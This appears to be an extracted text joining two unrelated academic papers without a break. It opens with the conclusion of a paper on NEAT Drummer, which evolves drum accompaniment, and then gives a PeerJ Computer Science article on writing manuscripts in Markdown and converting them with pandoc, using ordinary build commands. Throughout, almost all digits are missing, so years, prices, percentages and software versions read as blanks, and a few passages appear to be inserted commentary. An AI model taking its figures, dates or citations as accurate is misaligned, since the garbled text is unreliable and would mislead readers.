interactive evolution.
this result raises the question of whether it is biologically realistic in connectionist models of music generation to rely upon recurrence as the main mechanism of musical encoding. it is also plausible that the brain stores music in part as simple functions that are layered and composed one upon another. it is notable that evolving a recurrent network (figure b) and a feedforward network that is a function of both position-in-song and position-in-measure (figure ) produced results of similar quality. thus the question remains open whether the best infrastructure for generating temporal patterns is recurrence, or whether it is two simple timing signals upon which feedforward functions can be built. it may also be a combination of the two. conclusion this paper argued that the reason human musicians can improvise and compose vast and complex accompaniments almost instantaneously is that they are in effect generating a simple function that relates one instrument's part to another's. this idea was implemented in a program called neat drummer that generates novel drum tracks for existing midi songs. furthermore, the idea of a conductor, i.e. a simple hidden function that affects the overall pattern of music, was introduced. the results demonstrated the viability of this model of musical creativity, producing drum tracks that tightly follow the contours of real songs yet still produce nontrivial accompaniment. the conductors seamlessly introduced variational motifs over and above those already in the existing song structure, creating a new way for humans with little musical expertise to control the overall structure of a song. the main conclusion is that a significant portion of musical creativity may be explained by the functional relationships between the different parts of a song. acknowledgments special thanks to michael rosario for his prior work at the university of central florida creating the software infrastructure for neat drummer. special thanks also to barry taylor for granting special permission to utilize his own midi productions of folk music in this work. barry taylor originally sequenced johnny cope, oh! susanna, and oh! dem golden slippers (all without percussion), which are the three songs for which drum tracks were generated in sections and . this research was supported in part by nsf grants iis-reu: and iis-reu .
submitted december accepted april published may corresponding author robert winkler, robert.winkler@cinvestav.mx academic editor sebastian ventura additional information and declarations can be found on page doi . /peerj-cs. copyright krewinkel and winkler distributed under creative commons cc-by . open access formatting open science: agilely creating multiple document formats for academic manuscripts with pandoc scholar albert krewinkel and robert winkler pandoc development team, berlin, germany department of biotechnology and biochemistry, cinvestav unidad irapuato, mexico abstract the timely publication of scientific results is essential for dynamic advances in science. the ubiquitous availability of computers which are connected to a global network made the rapid and low-cost distribution of information through electronic channels possible. new concepts, such as open access publishing and preprint servers, are currently changing the traditional print media business towards a community-driven peer production. however, the cost of scientific literature generation, which is either charged to readers, authors or sponsors, is still high. the main active participants in the authoring and evaluation of scientific manuscripts are volunteers, and the cost for online publishing infrastructure is close to negligible. a major time and cost factor is the formatting of manuscripts in the production stage. in this article we demonstrate the feasibility of writing scientific manuscripts in plain markdown (md) text files, which can be easily converted into common publication formats, such as pdf, html or epub, using pandoc. the simple syntax of markdown assures the long-term readability of raw files and the development of software and workflows. we show the implementation of typical elements of scientific manuscripts (formulas, tables, code blocks and citations) and present tools for editing, collaborative writing and version control. we give an example on how to prepare a manuscript with distinct output formats, a docx file for submission to a journal, and a latex/pdf version for deposition as a peerj preprint. further, we implemented new features for supporting 'semantic web' applications, such as the 'journal article tag suite' (jats) and the 'citation typing ontology' (cito) standard. reducing the work spent on manuscript formatting translates directly to time and cost savings for writers, publishers, readers and sponsors.
therefore, the adoption of the md format contributes to the agile production of open science literature. pandoc scholar is freely available from https://github.com/pandoc-scholar. subjects human–computer interaction, computer education, computer networks and communications, digital libraries, world wide web and web science keywords open science, markdown, latex, publishing, typesetting, document formats introduction agile development of science depends on the continuous exchange of information between researchers (woelfle, olliaro & todd, ). in the past, physical copies of scientific works had to be produced and distributed. therefore, publishers needed to invest considerable resources for typesetting and printing. since the journals were mainly financed by their subscribers, their editors not only had to decide on the scientific quality of a submitted manuscript, but also on the potential interest to their readers. the availability of globally connected computers enabled the rapid exchange of information at low cost. yochai benkler ( ) predicts important changes in the information production economy, which are based on three observations: 1. a nonmarket motivation in areas such as education, arts, science, politics and theology. 2. the actual rise of nonmarket production, made possible through networked individuals and coordinate effects. 3. the emergence of large-scale peer production; for example, of software and encyclopedias. immaterial goods such as knowledge and culture are not lost when consumed or shared (they are 'nonrival'), and they enable a networked information economy, which is not commercially driven (benkler, ). preprints and e-prints in some areas of science a preprint culture, i.e., a paper-based exchange system of research ideas and results, already existed when paul ginsparg in initiated a server for the distribution of electronic preprints ('e-prints') about high-energy particle theory at the los alamos national laboratory (lanl), usa (ginsparg, ). later, the lanl server moved with ginsparg to cornell university, usa, and was renamed as arxiv (butler, ). currently, arxiv (https://arxiv.org/) publishes e-prints related to physics, mathematics, computer science, quantitative biology, quantitative finance and statistics. just a few years after the start of the first preprint servers, their important contribution to scientific communication was evident (ginsparg, ; youngen, ; brown, ). in , arxiv reached the impressive number of million e-prints (van noorden, ). in more conservative areas, such as chemistry and biology, accepting publishing prior to peer review took more time (brown, ). a preprint server for life sciences (http://biorxiv.org/) was launched by the cold spring harbor laboratory, usa, in (callaway, ). peerj preprints (https://peerj.com/preprints/), started in the same year, accepts manuscripts from biological sciences, medical sciences, health sciences and computer sciences.
the terms 'preprints' and 'e-prints' are used synonymously, since the physical distribution of preprints has become obsolete. a major drawback of preprint publishing is the sometimes restrictive policies of scientific publishers. the sherpa/romeo project informs about copyright policies and self-archiving options of individual publishers (http://www.sherpa.ac.uk/romeo/). open access the term 'open access' (oa) was introduced by the budapest open access initiative and was defined as: 'barrier-free access to online works and other resources. oa literature is digital, online, free of charge (gratis oa), and free of needless copyright and licensing restrictions (libre oa).' (suber, ) frustrated by the difficulty to access even digitized scientific literature, three scientists founded the public library of science (plos). in , plos biology was published as the first fully open access journal for biology (brown, eisen & varmus, ; eisen, ). thanks to the great success of oa publishing, many conventional print publishers now offer a so-called 'open access option', i.e., to make accepted articles free to read for an additional payment by the authors. the copyright in these hybrid models might remain with the publisher, whilst fully oa journals usually provide a liberal license, such as the creative commons attribution . international (cc by . , https://creativecommons.org/licenses/by/ . /). oa literature is only one component of a more general open philosophy, which also includes the access to scholarships, software, and data (willinsky, ). interestingly, there are several different 'schools of thought' on how to understand and define open science, as well as the position that any science is open by definition, because of its objective to make generated knowledge public (fecher & friesike, ). cost of journal article production in a recent study, the article processing charges (apcs) for research intensive universities in the usa and canada were estimated to be about , usd for fully oa journals and , usd for hybrid oa journals (solomon & björk, ). peerj (https://peerj.com/), an oa journal for biological and computer sciences launched in , drastically reduced the publishing cost, offering its members a life-time publishing plan for a small registration fee (van noorden, ); alternatively the authors can choose to pay an apc of $ , usd, which may be cheaper if multiple co-authors participate. examples such as the journal of statistical software (jss, https://www.jstatsoft.org/) and elife (https://elifesciences.org/) demonstrate the possibility of completely community-supported oa publications. figure compares the apcs of different oa publishing business models. jss and elife are peer-reviewed and indexed by thomson reuters. both journals are located in the q quality quartile in all their registered subject categories of the scimago journal & country rank (http://www.scimagojr.com/), demonstrating that high-quality publications can be produced without charging the scientific authors or readers. in , a study was carried out concerning the 'economic implications of alternative scholarly publishing models', which demonstrates an overall societal benefit by using oa publishing models (houghton et al., ). in the same report, the real publication costs are evaluated.
the relative costs of an article for the publisher are presented in fig . conventional publishers justify their high subscription or apc prices with the added value; for example, journalism (stated in the graphics as 'non-article processing'). however, stakeholder profits, which could be as high as %, also must be considered, and are withdrawn from the science budget (van noorden, ). generally, the production costs of an article could be roughly divided into commercial and academic/technical costs (fig. ). for nonmarket production, the commercial costs such as margins/profits, management etc. can be drastically reduced. hardware and services for hosting an editorial system, such as open journal systems of the public knowledge project (https://pkp.sfu.ca/ojs/), can be provided by public institutions. employed scholars can perform editor and reviewer activities without additional cost for the journals. nevertheless, 'article processing', which includes the manuscript handling during peer review and production, represents the most expensive part. therefore, we investigated a strategy for the efficient formatting of scientific manuscripts.
figure article processing charges (apcs) that authors have to pay with different open access (oa) publishing models. data from solomon & björk ( ) and journal web-pages.
figure estimated publishing cost for a 'hybrid' journal (conventional with open access option). data from houghton et al. ( ).
current standard publishing formats generally speaking, a scientific manuscript is composed of contents and formatting. while the content, i.e., text, figures, tables, citations etc., may remain the same between different publishing forms and journal styles, the formatting can be very different. most publishers require the formatting of submitted manuscripts in a certain format. ignoring this guide for authors (for example, by submitting a manuscript with a different reference style) gives a negative impression with a journal's editorial staff.
table current standard formats for scientific publishing.
type | description | use | syntax | reference
docx | office open xml | wysiwyg editing | xml, zip | ngo ( )
odt | opendocument | wysiwyg editing | xml, zip | brauer et al. ( )
pdf | portable document | print replacement | pdf | international organization for standardization ( )
epub | electronic publishing | e-books | html , zip | eikebrokk, dahl & kessel ( )
jats | journal article tag suite | journal publishing | xml | national information standards organization ( )
latex | typesetting system | high-quality print | tex | lamport ( )
html | hypertext markup | websites | (x)html | raggett, le hors & jacobs ( ) and hickson et al. ( )
md | markdown | lightweight markup | plain text | ovadia ( ) and leonard ( )
table examples for formatting elements and their implementations in different markup languages.
element | markdown | latex | html
structure: section | # intro | \section{intro} | <h >intro</h >
structure: subsection | ## history | \subsection{history} | <h >history</h >
text style: bold | **text** | \textbf{text} | <b>text</b>
text style: italics | *text* | \textit{text} | <i>text</i>
links: http link | <https://arxiv.org> | \usepackage{url}\url{https://arxiv.org} | <a href="https://arxiv.org"></a>
manuscripts which are too carelessly prepared can even provoke a straight 'desk-reject' (volmer & stokes, ). currently doc(x), latex and/or pdf file formats are the most frequently used formats for journal submission platforms. however, even if the content of a submitted manuscript might be accepted during the peer review 'as is', the format still needs to be adjusted to the particular publication style in the production stage. for the electronic distribution and archiving of scientific works, which is gaining more and more importance, additional formats (epub, (x)html, jats) need to be generated. table lists the file formats which are currently the most relevant ones for scientific publishing. although the content elements of documents, such as title, author, abstract, text, figures, tables, etc., remain the same, the syntax of the file formats is rather different. table demonstrates some simple examples of differences in different markup languages. documents with the commonly used office open xml (docx, microsoft word files) and opendocument (odt, libreoffice) file formats can be opened in a standard text editor after unzipping. however, content and formatting information is distributed into various folders and files. practically speaking, those file formats require the use of special word processing software. from a writer's perspective, the use of what you see is what you get (wysiwyg) programs such as microsoft word, wps office or libreoffice might be convenient, because
therefore, we were looking for a solution that enables the creation of scientific manuscripts in a simple format, with the subsequent generation of multiple output formats. the need for hybrid publishing has been recognized outside of science (kielhorn, ), but the requirements specific to scientific publishing have not been addressed so far. therefore, we investigated the possibility to generate multiple publication formats from a simple manuscript source file. concepts of markdown and pandoc markdown was originally developed by john gruber in collaboration with aaron swartz, with the goal to simplify the writing of html documents (http://daringfireball.net/ projects/markdown/). instead of coding a file in html syntax, the content of a document is written in plain text and annotated with simple tags which define the formatting. subsequently, the markdown (md) files are parsed to generate the final html document. with this concept, the source file remains easily readable and the author can focus on the contents rather than formatting. despite its original focus on the web, the md format has been proven to be well suited for academic writing (ovadia, ). in particular, pandoc-flavored md (http://pandoc.org/) adds several extensions which facilitate the krewinkel and winkler ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://calibre-ebook.com/ http://daringfireball.net/projects/markdown/ http://daringfireball.net/projects/markdown/ http://pandoc.org/ http://dx.doi.org/ . /peerj-cs. figure workfow for the generation of multiple document formats with pandoc. the markdown (md) file contains the manuscript text with formatting tags, and can also refer to external files such as images or reference databases. the pandoc processor converts the md file to the desired output formats. documents, citations etc. can be defined in style files or templates. authoring of academic documents and their conversion into multiple output formats. table demonstrates the simplicity of md compared to other markup languages. figure illustrates the generation of various formatted documents from a manuscript in pandoc md. some relevant functions for scientific texts are explained below in more detail. markdown editors and online editing the usability of a text editor is important for the author, either writing alone or with several co-authors. in this section we present software and strategies for different scenarios. figure summarizes various options for local or networked editing of md files. krewinkel and winkler ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure markdown files can be edited on local devices or on cloud drives. a local or remote git reposi- tory enables advanced advanced version control. markdown editors due to md’s simple syntax, basically any text editor is suitable for editing markdown files. the formatting tags are written in plain text and are easy to remember. therefore, the author is not distracted by looking around for layout options with the mouse. for several popular text editors, such as vim (http://www.vim.org/), gnu emacs (https://www.gnu.org/software/emacs/), atom (https://atom.io/) or geany (http://www.geany.org/), plugins provide additional functionality for markdown editing; for example, syntax highlighting, command helpers, live preview or structure browsing. various dedicated markdown editors have been published as well. 
many of those are cross-platform compatible, such as abricotine (http://abricotine.brrd.fr/), ghostwriter (https://github.com/wereturtle/ghostwriter) and cutemarked (https://cloose.github.io/cutemarked/). the lightweight format is also ideal for writing on mobile devices. numerous applications are available on the app stores for android and ios systems. the programs swype and dragon (http://www.nuance.com/) facilitate the input of text on such devices by guessing words from gestures and speech recognition (dictation). figure shows the editing of a markdown file, using the cross-platform editor atom with several markdown plugins.
figure document directory tree, editing window and html preview using the atom editor.
online editing and collaborative writing storing manuscripts on network drives (the cloud) has become popular for several reasons: • protection against data loss. • synchronization of documents between several devices. • collaborative editing options. markdown files on a google drive (https://drive.google.com), for instance, can be edited online with stackedit (https://stackedit.io). figure demonstrates the online editing of a markdown file on an owncloud (https://owncloud.com/) installation. owncloud is an open source software platform, which allows the set-up of a file server on personal webspace. the functionality of an owncloud installation can be enhanced by installing plugins. even mathematical formulas are rendered correctly in the html live preview window of the owncloud markdown plugin (fig. ).
figure direct online editing of this manuscript with live preview using the owncloud markdown editor plugin by robin appelman.
the collaboration and authoring platform authorea (https://www.authorea.com/) also supports markdown as one of multiple possible input formats. this can be beneficial for collaborations in which one or more authors are not familiar with markdown syntax. document versioning and change control programmers, especially when working in distributed teams, rely on version control systems to manage changes of code. currently, git (https://git-scm.com/), which is also used for the development of the linux kernel, is one of the most employed software solutions for versioning. git allows the parallel work of collaborators and has an efficient merging and conflict resolution system. a git repository may be used by a single local author to keep track of changes, or by a team with a remote repository; for example, on github (https://github.com/) or bitbucket (https://bitbucket.org/). because of the plain text format of markdown, git can be used for version control and distributed writing. for the writing of the present article, the co-authors (germany and mexico) used a remote git repository on bitbucket. the plain text syntax of markdown facilitates the visualization of differences of document versions, as shown in fig .
figure version control and collaborative editing using a git repository on bitbucket.
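to illustrate this kind of setup, a few generic git commands are enough to put a markdown manuscript under version control; the file names and commit messages below are only placeholders and are not part of the original tutorial material:

git init
git add manuscript.md references.bib
git commit -m "initial draft"
# ... edit manuscript.md in any text editor ...
git diff manuscript.md
git commit -am "revise introduction"
git push origin master   # optional: publish to a remote repository, e.g. on github or bitbucket

the same commands work for a single local author without any server; a remote repository only becomes necessary for collaborative writing.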
pandoc markdown for scientific texts in the following section, we demonstrate the potential for typesetting scientific manuscripts with pandoc using examples for typical document elements, such as tables, figures, formulas, code listings and references. a brief introduction is given by dominici ( ). the complete pandoc user's manual is available at http://pandoc.org/manual.html. tables there are several options to write tables in markdown. the most flexible alternative, which was also used for this article, are pipe tables. the contents of different cells are separated by pipe symbols (|):
left | center | right | default
:-----|:------:|------:|---------
lll | ccc | rrr | ddd
gives
left   center   right   default
lll    ccc      rrr     ddd
the headings and the alignment of the cells are given in the first two lines. the cell width is variable. the pandoc parameter --columns=num can be used to define the length of lines in characters; if contents do not fit, they will be wrapped. complex tables (for example, tables featuring multiple headers or those containing cells spanning multiple rows or columns) are currently not representable in markdown format. however, it is possible to embed latex and html tables into the document. these format-specific tables will only be included in the output if a document of the respective format is produced. this method can be extended to apply any kind of format-specific typographic functionality which would otherwise be unavailable in markdown syntax. figures and images images are inserted as follows: ![alt text](image location/name) e.g., ![publishing costs](fig-hybrid-publishing-costs.png) the alt text is used e.g., in html output. image dimensions can be defined in braces: ![](fig-hybrid-publishing-costs.png){width= mm} as well, an identifier for the figure can be defined with #, resulting e.g., in the image attributes {#figure height= %}. a paragraph containing only an image is interpreted as a figure. the alt text is then output as the figure's caption. symbols scientific texts often require special characters; for example, greek letters, mathematical and physical symbols, and so on. the utf- standard, developed and maintained by the unicode consortium, enables the use of characters across languages and computer platforms. the encoding is defined as rfc document of the network working group (yergeau, ) and as iso standard iso/iec : (international organization for standardization, ). specifications of unicode and code charts are provided on the unicode homepage (http://www.unicode.org/). in pandoc markdown documents, unicode characters such as ◦, α, ä, Å can be inserted directly and passed to the different output documents. the correct processing of md with utf- encoding to latex/pdf output requires the use of the --latex-engine=xelatex option and the use of an appropriate font.
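for instance, a pdf could then be produced with a call of the following form; the file names are illustrative, and in pandoc versions newer than the one used here the option has been renamed to --pdf-engine:

pandoc --latex-engine=xelatex -o manuscript.pdf manuscript.md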
the times-like xits font (https://github.com/khaledhosny/xits-math), suitable for high quality typesetting of scientific texts, can be set in the latex template:
\usepackage{unicode-math}
\setmainfont[
  extension = .otf,
  uprightfont = *-regular,
  boldfont = *-bold,
  italicfont = *-italic,
  bolditalicfont = *-bolditalic,
]{xits}
\setmathfont[
  extension = .otf,
  boldfont = *bold,
]{xits-math}
to facilitate the input of specific characters, so-called mnemonics can be enabled in some editors (e.g., in atom by the character-table package). for example, the two-character mnemonic ':u' gives 'ü' (diaeresis), and 'd*' gives the greek δ. the possible character mnemonics and character sets are listed in rfc : http://www.faqs.org/rfcs/rfc .html (simonsen, ). formulas formulas are written in latex mode using the delimiters $. for example, the formula for calculating the standard deviation s of a random sampling would be written as: $s=\sqrt{\frac{1}{n-1}\sum_{i=1}^n(x_i-\overline{x})^{2}}$ and gives: $$s=\sqrt{\frac{1}{n-1}\sum_{i=1}^{n}(x_i-\overline{x})^{2}}$$ with $x_i$ the individual observations, $\overline{x}$ the sample mean and $n$ the total number of samples. pandoc parses formulas into internal structures and allows conversion into formats other than latex. this allows for format-specific formula representation and enables computational analysis of the formulas (corbí & burgos, ). code listings verbatim code blocks are indicated by three tilde symbols:
~~~
verbatim code
~~~
typesetting inline code is possible by enclosing text between back ticks: `inline code`. other document elements these examples are only a short demonstration of the capacities of pandoc concerning scientific documents. for more detailed information, we refer to the official manual (http://pandoc.org/manual.html). citations and bibliography the efficient organization and typesetting of citations and bibliographies is crucial for academic writing. pandoc supports various strategies for managing references. for processing the citations and the creation of the bibliography, the command line parameter --filter pandoc-citeproc is used, with variables for the reference database and the bibliography style. the bibliography will be located automatically at the header # references or # bibliography. reference databases pandoc is able to process all mainstream literature database formats, such as ris, bib, etc. however, for maintaining compatibility with latex/bibtex, the use of bib databases is recommended. the used database can either be defined in the yaml metablock of the md file (see below) or be passed as a parameter when calling pandoc. inserting citations for inserting a reference, the database key is given within square brackets and indicated by an '@'. it is also possible to add information, such as pages: [@suber_open_ ; @benkler_wealth_ , ff.] gives (suber, ; benkler, , p. ff.). styles the citation style language (csl) (http://citationstyles.org/) is used for the citations and bibliographies. this file format is supported, for example, by the reference management programs mendeley (https://www.mendeley.com/), papers (http://papersapp.com/) and zotero (https://www.zotero.org/).
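putting these pieces together, a minimal and purely illustrative citation workflow could consist of a bibtex entry in a file such as references.bib,

@book{doe_example,
  author    = {Doe, Jane},
  title     = {An Example Monograph},
  year      = {2017},
  publisher = {Example Press}
}

a citation in the manuscript text, e.g. 'as argued previously [@doe_example, chap. 2]', and a pandoc call that combines the database with a csl style file:

pandoc --filter pandoc-citeproc --bibliography=references.bib --csl=example-journal.csl -o manuscript.pdf manuscript.md

all file names and the citation key in this sketch are placeholders rather than files belonging to the original manuscript.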
csl styles for particular journals can be found from the zotero style repository (https://www.zotero.org/styles). the bibliography style that pandoc should use for the target document can be chosen in the yaml block of the markdown document or can be passed as a command line option. the latter is more advisable, because distinct bibliography styles may be used for different documents. creation of latex natbib citations for citations in scientific manuscripts written in latex, the natbib package is widely used. to create a latex output file with natbib citations, pandoc simply has to be run with the --natbib option, but without the --filter pandoc-citeproc parameter. database of cited references to share the bibliography for a certain manuscript with co-authors or the publisher's production team, it is often desirable to generate a subset of a larger database, which only contains the cited references. if latex output was generated with the --natbib option, the compilation of the file with latex gives an aux file (in the example named md-article.aux), which subsequently can be extracted using bibtool (https://github.com/ge-ne/bibtool):
~~~
bibtool -x md-article.aux -o bibshort.bib
~~~
in this example, the article database will be called bibshort.bib. for the direct creation of an article-specific bib database without using latex, we wrote a simple perl script called mdbibexport (https://github.com/robert-winkler/mdbibexport). meta information of the document bourne ( ) argues that journals should be effectively equivalent to biological databases: both provide data which can be referenced by unique identifiers like doi or, for example, gene ids. applying the semantic-web ideas of berners-lee & hendler ( ) to this domain can make this vision a reality. here we show how metadata can be specified in markdown. we propose conventions, and demonstrate their suitability to enable interlinked and semantically enriched journal articles. document information such as title, authors, abstract etc. can be defined in a metadata block written in yaml syntax. yaml ('yaml ain't markup language', http://yaml.org/) is a data serialization standard in a simple, human readable format. variables defined in the yaml section are processed by pandoc and integrated into the generated documents. the yaml metadata block is recognized by three hyphens (---) at the beginning, and three hyphens or dots (...) at the end; for example:
---
title: formatting open science
subtitle: agile creation of multiple document types
date: - -
...
the public availability of all relevant information is a central aspect of open science. analogous to article contents, data should be accessible via default tools. we believe that this principle must also be applied to article metadata. thus, we created a custom pandoc writer that emits the article's data as json–ld (lanthaler & gütl, ), allowing for informational and navigational queries of the journal's data with standard tools of the semantic web.
the above yaml information would be output as:
{
  "@context": {
    "@vocab": "http://schema.org/",
    "date": "datepublished",
    "title": "headline",
    "subtitle": "alternativetitle"
  },
  "@type": "scholarlyarticle",
  "title": "formatting open science",
  "subtitle": "agile creation of multiple document types",
  "date": " - - "
}
this format allows processing of the information by standard data processing software and browsers. flexible metadata authoring we developed a method to allow writers the flexible specification of authors and their respective affiliations. author names can be given as a string, via the key of a single-element object, or explicitly as a name attribute of an object. affiliations can be specified directly as properties of the author object, or separately in the institute object. additional information, for example email addresses or identifiers like orcid (haak et al., ), can be added as additional values:
author:
  - john doe:
      institute: fs
      email: john.doe@example.com
      orcid: - - -
institute:
  fs: science formatting working group
jats support the journal article tag suite (jats) was developed by the national library of medicine (nlm) and standardized by ansi/niso as an archiving and exchange format of journal articles and the associated metadata (national information standards organization, ), including data of the type shown above. the pandoc-jats writer by martin fenner is a plugin usable with pandoc to produce jats-formatted output. the writer was adapted to be compatible with our metadata authoring method, allowing for the simple generation of files which contain the relevant metadata. citation types writers can add information about the reason a citation is given. this might help reviewers and readers, and can simplify the search for relevant literature. we developed an extended citation syntax that integrates seamlessly into markdown and can be used to add complementary information to citations. our method is based on cito, the citation typing ontology (shotton, ), which specifies a vocabulary for the motivation when citing a resource. the type of a citation can be added to a markdown citation using @cito_property:key, where cito_property is a supported cito property, and key is the usual citation key. our tool extracts that information and includes it in the generated linked data output. a general cito property (cites) is used if no cito property is found in a citation key. the work at hand will always be the subject of the generated semantic subject–predicate–object triples. some cito predicates cannot be used in a sensible way under this condition. focusing on author convenience, we use this fact to allow shortening of properties when sensible. for example, if the authors of a biological paper include a reference to the paper describing a method which was used in their work, this relation can be described by the uses_method_in property of the cito ontology. the inverse property, provides_method_for, would always be nonsensical in this context as implied by causality. it is therefore not supported by our tool. this allows us to introduce an abbreviation (method) for uses_method_in, as any ambiguity has been eliminated. users of western blotting might hence write @method_in:towbin_ or even just @method:towbin_ , where towbin_ is the citation identifier of the paper by towbin, staehelin & gordon ( ) describing that method.
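as a concrete illustration, a methods sentence in the markdown source could then read as follows; the citation key is a hypothetical one modelled on the pattern above:

proteins were detected by western blotting [@method:towbin_1979].

as described above, the tool extracts the cito property from such a citation and records the typed relation in the generated linked-data output.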
example: manuscript with output of docx/odt format and latex/pdf for submission to different journals scientific manuscripts have to be submitted in a format defined by the journal or publisher. at the moment, docx is the most common file format for manuscript submission. some publishers also accept or require latex or odt formats. additional to the general style of the manuscript (organization of sections, fonts, etc.), the citation style of the journal must also be followed. often, the same manuscript has to be prepared for different journals; for example, if the manuscript was rejected by one journal and has to be formatted for another one, or if a preprint of the paper is submitted to an archive that requires a different document format than the targeted peer-reviewed journal. in this example, we want to create a manuscript for a plos journal in docx and odt format for wysiwyg word processors. further, a version in latex/pdf should be produced for peerj submission and archiving at the peerj preprint server. the examples for docx/odt are kept relatively simple, to show the proof-of-principle and to provide a plain document for the development of own templates. nevertheless, the generated documents should be suitable for submission after little manual editing. for specific journals it may be necessary to create more sophisticated templates or to copy/paste the generic docx/odt output into the publisher's template. development of a docx/odt template a first docx document with a bibliography in plos format is created with pandoc docx output:
pandoc -s -S --csl=plos.csl --filter pandoc-citeproc -o pandoc-manuscript.docx agile-editing-pandoc.md
the parameters -s and -S generate a typographically correct (dashes, non-breaking spaces etc.) stand-alone document. a bibliography with the plos style is created by the citeproc filter setting --csl=plos.csl --filter pandoc-citeproc. the document settings and styles of the resulting file pandoc-manuscript.docx can be optimized and then be used again as a document template (--reference-docx=pandoc-manuscript.docx):
pandoc -s -S --reference-docx=pandoc-manuscript.docx --csl=plos.csl --filter pandoc-citeproc -o outfile.docx agile-editing-pandoc.md
it is also possible to directly re-use a previous output file as template (i.e., template and output file have the same file name):
pandoc -s -S --columns= --reference-docx=pandoc-manuscript.docx --csl=plos.csl --filter=pandoc-citeproc -o pandoc-manuscript.docx agile-editing-pandoc.md
in this way, the template can be incrementally adjusted to the desired document formatting. the final document may be employed later as a pandoc template for other manuscripts with the same specifications. in this case, running pandoc the first time with the template, the contents of the new manuscript are filled into the provided docx template. a page with the docx manuscript formatting of this article is shown in fig .
figure opening a pandoc-generated docx in microsoft office .
the same procedure can be applied with an odt formatted document.
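a sketch of the corresponding odt commands, assuming the same illustrative file names as above, could look like this; note that older pandoc versions provide a separate --reference-odt option, while newer versions use the combined --reference-doc option instead:

pandoc -s -S --csl=plos.csl --filter pandoc-citeproc -o pandoc-manuscript.odt agile-editing-pandoc.md
pandoc -s -S --reference-odt=pandoc-manuscript.odt --csl=plos.csl --filter pandoc-citeproc -o pandoc-manuscript.odt agile-editing-pandoc.md

as in the docx case, the first call produces an initial document whose styles can be adjusted and then re-used as the reference document in the second call.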
development of a tex/pdf template the default pandoc latex template can be written into a separate file by:
pandoc -D latex > template-peerj.latex
this template can be adjusted; for example, by defining unicode encoding (see above), by including particular packages or by setting document options (line numbering, font size). the template can then be used with the pandoc parameter --template=template-peerj.latex. the templates used for this document are included as supplemental material (see section 'software and code availability' below). styles for html and epub the style for html and epub formats can be defined in .css stylesheets. the supplemental material (see section 'software and code availability' below) contains a simple example .css file for modifying the html output, which can be used with the pandoc parameter -c pandoc.css. automating document production the commands necessary to produce the document in a specific format or style can be defined in a simple makefile. an example makefile is included in the source code of this article. the desired output file format can be chosen when calling make. for example, make outfile.pdf produces this article in pdf format. calling make without any option creates all listed document types. a makefile producing docx, odt, jats, pdf, latex, html and epub files of this document is provided as supplemental material (see section 'software and code availability' below). cross-platform compatibility the make process was tested on windows and linux bit. all documents (docx, odt, jats, latex, pdf, epub and html) were generated successfully, which demonstrates the cross-platform compatibility of the workflow.
table relevant software used for this article.
software | use | authors | version | release | homepage/repository
pandoc | universal markup converter | john macfarlane | . . . | / / | http://www.pandoc.org
pandoc-citeproc | library for csl citations with pandoc | john macfarlane, andrea rossato | . . | / / | https://github.com/jgm/pandoc-citeproc
pandoc-jats | creation of jats files with pandoc | martin fenner | . | / / | https://github.com/mfenner/pandoc-jats
owncloud | personal cloud software | owncloud gmbh, community | . . | / / | https://owncloud.org/
markdown editor | plugin for owncloud | robin appelman | . | / / | https://github.com/icewind /files_markdown
bibtool | bibtex database tool | gerd neugebauer | . | / / | https://github.com/ge-ne/bibtool
perspective following the trend to peer production, the formatting of scientific content must become more efficient. markdown/pandoc has the potential to play a key role in the transition from proprietary to community-driven academic production. important research tools, such as the statistical computing and graphics language r (r core team, ) and the jupyter notebook project (kluyver et al., ), have already adopted the md syntax (for example, http://rmarkdown.rstudio.com/). the software for writing manuscripts in md is mature enough to be used by academic writers. therefore, publishers should also consider implementing the md format into their editorial platforms. conclusions authoring scientific manuscripts in markdown (md) format is straightforward, and manual formatting is reduced to a minimum. the simple syntax of md facilitates document editing and collaborative writing.
the rapid conversion of md to multiple formats such as docx, latex, pdf, epub and html can be done easily using pandoc, and templates enable the automated generation of documents according to specific journal styles. the additional features we implemented facilitate the correct indexing of meta information of journal articles according to the 'semantic web' philosophy. altogether, the md format supports the agile writing and fast production of scientific literature. the associated time and cost reduction especially favours community-driven publication strategies. software and code availability the relevant software used for creating this manuscript is cited according to smith, katz & niemeyer ( ) and listed in table . since unique identifiers are missing for most software projects, we only refer to the project homepages or software repositories. acknowledgements we cordially thank dr. gerd neugebauer for his help in creating a subset of a bibtex data base using bibtool, as well as dr. ricardo a. chávez montes, prof. magnus palmblad and martin fenner for comments on the manuscript. warm thanks also go to anubhav kumar and jennifer könig for proofreading. additional information and declarations funding the work was funded by the consejo nacional de ciencia y tecnología (conacyt) mexico, with the grant fronteras - / and by institutional funding of the centro de investigación y de estudios avanzados del instituto politécnico nacional (cinvestav). the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: consejo nacional de ciencia y tecnología (conacyt). fronteras - / . centro de investigación y de estudios avanzados del instituto politécnico nacional (cinvestav). competing interests albert krewinkel is a voluntary member of the pandoc development team. robert winkler is an academic editor for peerj. we have no financial/legal conflict of interest. author contributions • albert krewinkel and robert winkler conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper, programming. data availability the following information was supplied regarding data availability: the software created as part of this article, pandoc-scholar, is suitable for general use and has been published at https://github.com/pandoc-scholar/pandoc-scholar; . /zenodo. . the source code of this manuscript, as well as the templates and pandoc makefile, have been deposited to https://github.com/robert-winkler/scientific-articles-markdown/.
